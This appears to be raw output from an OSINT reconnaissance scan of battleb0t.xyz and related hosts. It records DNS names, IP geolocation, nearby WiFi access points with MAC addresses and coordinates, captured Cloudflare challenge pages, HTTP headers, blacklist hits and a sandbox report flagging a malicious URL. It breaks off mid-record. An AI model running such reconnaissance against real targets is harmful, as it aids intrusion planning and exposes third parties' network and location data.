| 2023-05-12 03:41:36 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 3 | 0 | None | {u'city': u'Eygelshoven', u'security': {u'is_vpn': False}, u'city_geoname_id': 2756285, u'region_geoname_id': 2751596, u'country': u'Netherlands', u'region': u'Limburg', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'SYNLINQ', u'isp_name': u'CSH LLC', u'organization_name': u'CSH', u'autonomous_system_number': 44486}, u'continent_code': u'EU', u'currency': {u'currency_name': u'Euros', u'currency_code': u'EUR'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/NL_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/NL_flag.png', u'unicode': u'U+1F1F3 U+1F1F1', u'emoji': u'\U0001f1f3\U0001f1f1'}, u'postal_code': u'6471', u'longitude': 6.0563, u'country_code': u'NL', u'timezone': {u'abbreviation': u'CEST', u'gmt_offset': 2, u'is_dst': True, u'name': u'Europe/Amsterdam', u'current_time': u'05:41:35'}, u'latitude': 50.8897, u'country_geoname_id': 2750405, u'continent_geoname_id': 6255148, u'country_is_eu': True, u'ip_address': u'45.131.109.53', u'continent': u'Europe', u'region_iso_code': u'LI'} | 45.131.109.53 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | no_ssid (Net ID: 00:00:AA:A0:63:98) | 41.8781, -87.6298 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/nwp.PNG | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:24:22 | Web Content | No | Web Spider | 2 | 0 | 4 | 0 | None | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f8c5eeb1a42bf')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="OwKUCDNMgBcJHVKY8nwcXEP4QH6PT2kVm2HBGkp44qM-1683861862-0-AWLoc992boZljuKuI-OBA8JKemVnVUC1OpOL5WA6H__Iq90123kv27raPeBnAM1gG8-u_GUHUIjkNRARNHi-eimNvmJ4rPPxMkUV2QmYUEqMIZBr0A65Rs8LmsZu82c9s9x6llue0RdEW_caMvviu63PT1rv_bBKXMf1rHRuL651jz2WFzUdCtMQpW6Egz9tRVRjq5p5DSqDh55BkcMfXifbvXVDgCJtfVyuppJGXIw1O3dWJT8pln-UY4GtVbRsMFPevbWJODfBaMma6BpIVfB3OcO1PwoUlljtOyyIFegfArGbCDdTMuWW7MTLDlShBnu-Lhu5vOc-Ud28hWS6Af2dBCBcHh5XGl_1kuftIN3x2Yrz1OgV60xO0_Ft4cvMx22_Xbt7KQegGiYk7J4oDHrBq-69T02ReScczZXd4TQyXoU9qHcKZvKsNQmpV8fSqGGhR6xiFbU8_QFDTT8jXa5OZWcXPnNRfc6AD50gDy5Q6ftPGx8ku1bIa-BYJl0tEjfjvdrLmpKOgvt9HqryqBGQGW4sUnihX9ydJUDsex46ckUHkCXeufqZn5AD6MtN5oYFRHHhtjXnJcAp8WeElzI07rPkFj51H8EcsL4wD4_j8spF714slOYp5I3UNmZcpEY7hPbC_UrXxeNbe8Vb8W4O-5IvI2tAlXSs551O3aDHuLsWbsArUO69cE4cxnurB8E2VDklGwp0UjIA1ZbCcpeAqz4V9q7Rwf-aIp9UCsMIdDd03vJdv4BEy-C0uG1-hj0OttJBemux1PqA1Oxh9yKktn6NkFswTsNgRXA8FQdJPB55BpT7hX34f--63YYznOGOdwPnDQcV50l_KNiuyd5iXvh6Ql-Y6gEkavuOPF7ZE9H3PdFRCjRHpQfMmVGrr33gOKExrD-4XicoHlXnlplsncZhnYm0eFVn58vM-kJzFzoAYzJQ6LHPK-rLwUXHzdM6AMR_OdpTBapGpYQut19xKMEhf7XFlJB3i5IvPoLlbKbnM6DASBEm9gloHgHGhLjyH1D86MFl7dLmOy7HXf9Dt59vLXRTySh361-MOVviaFEilkvPgOfzGNeoCglzenOA29aR5-LvniWcnxwdMx19GiPvWq5dL0FsY-IaI8C318jSGkDd19eYdtZYb5Trduu1XD0QykyRaGCiXFCKXs9qPoDsrChJMKxRJKG6txIjwI-hz9vzBTixzmEz31H_03qyn6xl9MHLNpR4uoY5ttVTXocR7hDlDoTIHoxw4bmwvZZns-g2xlnvOFfDm6Z3ymoAiBTVXb9UI0-FgG-KNuyY4Y49oFMfBVNbHXGX0NQ7nC0zQXw0LMG69KhyLsZAbvBSEmnEAy81l38C-eHlDjsSlcF_pEqbs8b24FlZ_Ycg5qR-qEhQLJ_IivsUFKo4fWdGLbL7vtldXPDD9ikL5U_HiqKqxo8b-MjuggAlbaMrnYqciKkrFAYhtlSn6vG0BcwQbEZVsrKxnf1U5iCKBIDK1cXcJ7qxw6FoFlpbsT9cf9V-SFcvkbQR4ynJNaf1tfeZ6cTUfprkZy8GusVJdlQcoHnz3EkTZyvTp96y0si0IlMRhE1eqk8AoDep7FzFKBEGzL7gDQU2Jn1nwjFLKXoqiHtb5T9bBlt5hhj_Ci6kEYTQdRQGW8cTzRzMqPyN66hhKyLGLcgc7GZethYHaIwxFGmc_-FTVSTksGANC23y4Y0EQ958se1s8VzeS_g_Q7AoqHmpjBZ2xnQukuWvbqKS_jTYtZPUwascKOCTAnovpYgH8wEPiBeTBcqYmCRQUV1WQ5Sl2pAf4AfP3RpDCeUM9RYjWn8EtaTb5Bhr_k9830NT-b8RF7puAAgLTTKA4q6e5vn2ewBbnV7XJ0GouaXcDgkRUitPYbV97TyYXMDG5jrsoDMwKExF3yfQ65a4HURQJ3I0-2cN6cUG-Y-wfJ_ULyEJZKHCJ0AAHYnUol27xezw1EIch91oOc2hzP8yiIMXI8T3Yo-aupeX9LKThZP5WSadqXIdAKdNvRnbMtEuMzDmhmp29m0ybwuinUP8O7RYb7j1B42foptRV6LcZaaB7GxtNFE6cbYJEgKR3EVXJ9v1X1LNujPJ_2-MknLO1BAr44SCZq4n5UiQqguKB0ip0JOSrV9oOqb3mxkBI20TA2suDdWcUUiDjuemwe_R_SFef-VIvq4m-JFV_iinHTfs5xSvQj_DV9QpslncdUm4d3a4BDcKZYMI_YaNhT37IZDWJKLAZUX_a4_bgw8NO47VSFunBOSL4CABnjTz1vyLJql2e3xxqjgafM7I6m59nuymQeY8F1qvaKmYyA1bIjmlBpJjIy-YvbCvFy0xRzKQttdY1KMKqJpm2hMaWno-PDyzEL6Hdcvve0j1uskEzjTLP_kK22Nhie7r9a88EK-EJpd4ugQ4u7t-kbsifC-M0rVW6p8dFHSbqa0iaKw84zeu6BHIQYJpq8ZELQZOExGCyk3QdEEKgtXofElfaYiQeb5hxWCA9mTHgbKSVuU6D2o">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '2801',
cRay: '7c5f8c5eeb1a42bf',
cHash: '66932cb8b087b32',
cUPMDTk: "\/?__cf_chl_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei8=',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'bBrUwSR1j4q+jiK831F3uz4Yhp8vDXUt4BefqtjwDOM1gm//5501ZpnQ7c811CiMG7EvRE/6yKWzdSdEgeqlKrPobmKgPq4s4sf5keh0JSpRTFqyThcJtJJr1NWRsfypsHrBAC+XbLByIcYvWD8TmKM3Lhv7t6zi6igSlfKXyW90iyZVyqiH832ebLGiO/GSvvShgl1OfVaUjymgCjY8n2bwTQnz1bukp+HAMcsu1wZ3PK1kdPfO+f6tcNFOs2NyMVJRmQfONHTCt2nKiRK6ouj1Q6Ih203tDYZ5b0WmDfvIz7g3fRTkgLvOxApauVZZ+Pn/FqSlbbEuJ5Y0aM2tvO/8QCq5RpbNSQjdvneQgssTK9l1UKSvRFVWE5iKT4EQV1PBMPxYDBJ+CvYrUHSFx9P+yC9YQqnfqdmyJ9FgXN/PhzJhVNTNCuoNVqV31Wu1Q5EP48PNidXTO4PmCrJKW8p3kSzZx/9Yl/8dCnD9smPeVcx5F6nXmnXOfIJiYKRBRZ58nvyXlIirQZyiZSy0uk2tqc5S71/Aw3pbF23wUkCK/NSr0bVfW1AY4v9YGH9L',
t: 'MTY4Mzg2MTg2Mi4yMjQwMDA=',
m: 'kADszgADVaHA/mRyw7h+MKSs6RoLc0QTNBq8+AYYMs8=',
i1: 'q0RPvxk//GqHpe4FgiHvYg==',
i2: 'CV688EYHriA2UWvDyWxv3g==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f8c5eeb1a42bf');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f8c5eeb1a42bf';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
| https://ayhu.xyz/?__cf_chl_f_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | TotalWar (Category: gaming)
https://forums.totalwar.com/profile/login | login |
| 2023-05-12 03:09:48 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 75.170.74.34.bc.googleusercontent.com | 34.74.170.75 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | gclabc (Net ID: 00:0B:86:22:0F:31) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gKkAv2ueXH0GbQQgHQUB1ba%2FGC57%2Fw1l33qylJQZwo8rZZSQGe9chbhvY39IMKx8OGwCgg014ANieMLMNm0k2vb6aYv4qeDTvVzmiQmtAm9hGZFwG%2BXVyUTLjJ6w5y8UPVYOV9MG"}],"group":"cf-nel","max_age":604800} | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "x-powered-by": "Express", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "content-encoding": "gzip", "server": "cloudflare", "last-modified": "Tue, 01 Jan 1980 00:00:01 GMT", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=gKkAv2ueXH0GbQQgHQUB1ba%2FGC57%2Fw1l33qylJQZwo8rZZSQGe9chbhvY39IMKx8OGwCgg014ANieMLMNm0k2vb6aYv4qeDTvVzmiQmtAm9hGZFwG%2BXVyUTLjJ6w5y8UPVYOV9MG\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0", "date": "Fri, 12 May 2023 02:54:18 GMT", "cf-ray": "7c5f6051f8c478df-EWR", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "content-type": "text/html; charset=UTF-8"} |
| 2023-05-12 02:44:24 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | kekw.battleb0t.xyz | CN=kekw.battleb0t.xyz |
| 2023-05-12 03:43:57 | URL (Form) | No | Page Information | 0 | 0 | 5 | 0 | None | https://ayhu.xyz/?__cf_chl_f_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f8c5eeb1a42bf')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="OwKUCDNMgBcJHVKY8nwcXEP4QH6PT2kVm2HBGkp44qM-1683861862-0-AWLoc992boZljuKuI-OBA8JKemVnVUC1OpOL5WA6H__Iq90123kv27raPeBnAM1gG8-u_GUHUIjkNRARNHi-eimNvmJ4rPPxMkUV2QmYUEqMIZBr0A65Rs8LmsZu82c9s9x6llue0RdEW_caMvviu63PT1rv_bBKXMf1rHRuL651jz2WFzUdCtMQpW6Egz9tRVRjq5p5DSqDh55BkcMfXifbvXVDgCJtfVyuppJGXIw1O3dWJT8pln-UY4GtVbRsMFPevbWJODfBaMma6BpIVfB3OcO1PwoUlljtOyyIFegfArGbCDdTMuWW7MTLDlShBnu-Lhu5vOc-Ud28hWS6Af2dBCBcHh5XGl_1kuftIN3x2Yrz1OgV60xO0_Ft4cvMx22_Xbt7KQegGiYk7J4oDHrBq-69T02ReScczZXd4TQyXoU9qHcKZvKsNQmpV8fSqGGhR6xiFbU8_QFDTT8jXa5OZWcXPnNRfc6AD50gDy5Q6ftPGx8ku1bIa-BYJl0tEjfjvdrLmpKOgvt9HqryqBGQGW4sUnihX9ydJUDsex46ckUHkCXeufqZn5AD6MtN5oYFRHHhtjXnJcAp8WeElzI07rPkFj51H8EcsL4wD4_j8spF714slOYp5I3UNmZcpEY7hPbC_UrXxeNbe8Vb8W4O-5IvI2tAlXSs551O3aDHuLsWbsArUO69cE4cxnurB8E2VDklGwp0UjIA1ZbCcpeAqz4V9q7Rwf-aIp9UCsMIdDd03vJdv4BEy-C0uG1-hj0OttJBemux1PqA1Oxh9yKktn6NkFswTsNgRXA8FQdJPB55BpT7hX34f--63YYznOGOdwPnDQcV50l_KNiuyd5iXvh6Ql-Y6gEkavuOPF7ZE9H3PdFRCjRHpQfMmVGrr33gOKExrD-4XicoHlXnlplsncZhnYm0eFVn58vM-kJzFzoAYzJQ6LHPK-rLwUXHzdM6AMR_OdpTBapGpYQut19xKMEhf7XFlJB3i5IvPoLlbKbnM6DASBEm9gloHgHGhLjyH1D86MFl7dLmOy7HXf9Dt59vLXRTySh361-MOVviaFEilkvPgOfzGNeoCglzenOA29aR5-LvniWcnxwdMx19GiPvWq5dL0FsY-IaI8C318jSGkDd19eYdtZYb5Trduu1XD0QykyRaGCiXFCKXs9qPoDsrChJMKxRJKG6txIjwI-hz9vzBTixzmEz31H_03qyn6xl9MHLNpR4uoY5ttVTXocR7hDlDoTIHoxw4bmwvZZns-g2xlnvOFfDm6Z3ymoAiBTVXb9UI0-FgG-KNuyY4Y49oFMfBVNbHXGX0NQ7nC0zQXw0LMG69KhyLsZAbvBSEmnEAy81l38C-eHlDjsSlcF_pEqbs8b24FlZ_Ycg5qR-qEhQLJ_IivsUFKo4fWdGLbL7vtldXPDD9ikL5U_HiqKqxo8b-MjuggAlbaMrnYqciKkrFAYhtlSn6vG0BcwQbEZVsrKxnf1U5iCKBIDK1cXcJ7qxw6FoFlpbsT9cf9V-SFcvkbQR4ynJNaf1tfeZ6cTUfprkZy8GusVJdlQcoHnz3EkTZyvTp96y0si0IlMRhE1eqk8AoDep7FzFKBEGzL7gDQU2Jn1nwjFLKXoqiHtb5T9bBlt5hhj_Ci6kEYTQdRQGW8cTzRzMqPyN66hhKyLGLcgc7GZethYHaIwxFGmc_-FTVSTksGANC23y4Y0EQ958se1s8VzeS_g_Q7AoqHmpjBZ2xnQukuWvbqKS_jTYtZPUwascKOCTAnovpYgH8wEPiBeTBcqYmCRQUV1WQ5Sl2pAf4AfP3RpDCeUM9RYjWn8EtaTb5Bhr_k9830NT-b8RF7puAAgLTTKA4q6e5vn2ewBbnV7XJ0GouaXcDgkRUitPYbV97TyYXMDG5jrsoDMwKExF3yfQ65a4HURQJ3I0-2cN6cUG-Y-wfJ_ULyEJZKHCJ0AAHYnUol27xezw1EIch91oOc2hzP8yiIMXI8T3Yo-aupeX9LKThZP5WSadqXIdAKdNvRnbMtEuMzDmhmp29m0ybwuinUP8O7RYb7j1B42foptRV6LcZaaB7GxtNFE6cbYJEgKR3EVXJ9v1X1LNujPJ_2-MknLO1BAr44SCZq4n5UiQqguKB0ip0JOSrV9oOqb3mxkBI20TA2suDdWcUUiDjuemwe_R_SFef-VIvq4m-JFV_iinHTfs5xSvQj_DV9QpslncdUm4d3a4BDcKZYMI_YaNhT37IZDWJKLAZUX_a4_bgw8NO47VSFunBOSL4CABnjTz1vyLJql2e3xxqjgafM7I6m59nuymQeY8F1qvaKmYyA1bIjmlBpJjIy-YvbCvFy0xRzKQttdY1KMKqJpm2hMaWno-PDyzEL6Hdcvve0j1uskEzjTLP_kK22Nhie7r9a88EK-EJpd4ugQ4u7t-kbsifC-M0rVW6p8dFHSbqa0iaKw84zeu6BHIQYJpq8ZELQZOExGCyk3QdEEKgtXofElfaYiQeb5hxWCA9mTHgbKSVuU6D2o">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '2801',
cRay: '7c5f8c5eeb1a42bf',
cHash: '66932cb8b087b32',
cUPMDTk: "\/?__cf_chl_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei8=',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'bBrUwSR1j4q+jiK831F3uz4Yhp8vDXUt4BefqtjwDOM1gm//5501ZpnQ7c811CiMG7EvRE/6yKWzdSdEgeqlKrPobmKgPq4s4sf5keh0JSpRTFqyThcJtJJr1NWRsfypsHrBAC+XbLByIcYvWD8TmKM3Lhv7t6zi6igSlfKXyW90iyZVyqiH832ebLGiO/GSvvShgl1OfVaUjymgCjY8n2bwTQnz1bukp+HAMcsu1wZ3PK1kdPfO+f6tcNFOs2NyMVJRmQfONHTCt2nKiRK6ouj1Q6Ih203tDYZ5b0WmDfvIz7g3fRTkgLvOxApauVZZ+Pn/FqSlbbEuJ5Y0aM2tvO/8QCq5RpbNSQjdvneQgssTK9l1UKSvRFVWE5iKT4EQV1PBMPxYDBJ+CvYrUHSFx9P+yC9YQqnfqdmyJ9FgXN/PhzJhVNTNCuoNVqV31Wu1Q5EP48PNidXTO4PmCrJKW8p3kSzZx/9Yl/8dCnD9smPeVcx5F6nXmnXOfIJiYKRBRZ58nvyXlIirQZyiZSy0uk2tqc5S71/Aw3pbF23wUkCK/NSr0bVfW1AY4v9YGH9L',
t: 'MTY4Mzg2MTg2Mi4yMjQwMDA=',
m: 'kADszgADVaHA/mRyw7h+MKSs6RoLc0QTNBq8+AYYMs8=',
i1: 'q0RPvxk//GqHpe4FgiHvYg==',
i2: 'CV688EYHriA2UWvDyWxv3g==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f8c5eeb1a42bf');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f8c5eeb1a42bf';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | jack (Net ID: 00:02:6F:66:E7:97) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | wireless (Net ID: 00:01:36:06:41:8A) | 52.3759, 4.8975 |
| 2023-05-12 03:01:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.53): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:13 | HTTP Status Code | No | Web Spider | 0 | 0 | 3 | 0 | None | 200 | https://battleb0t.xyz/./src/style.css?4 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:EB:4A:C2) | 37.7642, -122.3993 |
| 2023-05-12 03:00:26 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.8): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:16 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.142): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:39 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}, {u'url': u'https://zip.co/us/quadpay-terms-of-service', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 17, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://llink.to/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\SM0:7644:120:WilError_01"\n "Local\\SM0:6860:304:WilStaging_02"\n "InternetShortcutMutex"\n "Local\\SM0:6860:120:WilError_01"\n "SM0:6860:120:WilError_01"\n "Local\\SM0:7644:304:WilStaging_02"\n "Local\\SM0:7644:120:WilError_01"\n "ChromeProcessSingletonStartup!"\n "SM0:7644:304:WilStaging_02"\n "SM0:7644:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7644:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7644:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:7644:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"\n "172.66.40.106:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"llink.to"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"5144be6e-1fb5-4ccf-a6bb-97994802abee.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\5144be6e-1fb5-4ccf-a6bb-97994802abee.tmp]- [targetUID: 00000000-00007644]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7644_944314722\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00007644]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\shared_proto_db\\metadata\\000003.log]- [targetUID: 00000000-00007644]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\OriginTrials\\0.0.1.4\\manifest.fingerprint]- [targetUID: 00000000-00007644]\n "86ed2985-a38b-4024-8ad5-44fad2c266c2.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\86ed2985-a38b-4024-8ad5-44fad2c266c2.tmp]- [targetUID: 00000000-00007644]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00007644]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00007644]\n "f07ca44d-1df1-4eb1-be1f-67e2d74964d3.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 25822"- [targetUID: N/A]\n "f76618b8-551d-4dd4-a273-f8a4439756ce.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\f76618b8-551d-4dd4-a273-f8a4439756ce.tmp]- [targetUID: 00000000-00007644]\n "regex_patterns.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Autofill\\3.0.0.3\\regex_patterns.json]- [targetUID: 00000000-00007644]\n "6a1e5492-4008-43f5-94ff-1f30706f466e.tmp" has type "JSON data"- Location: 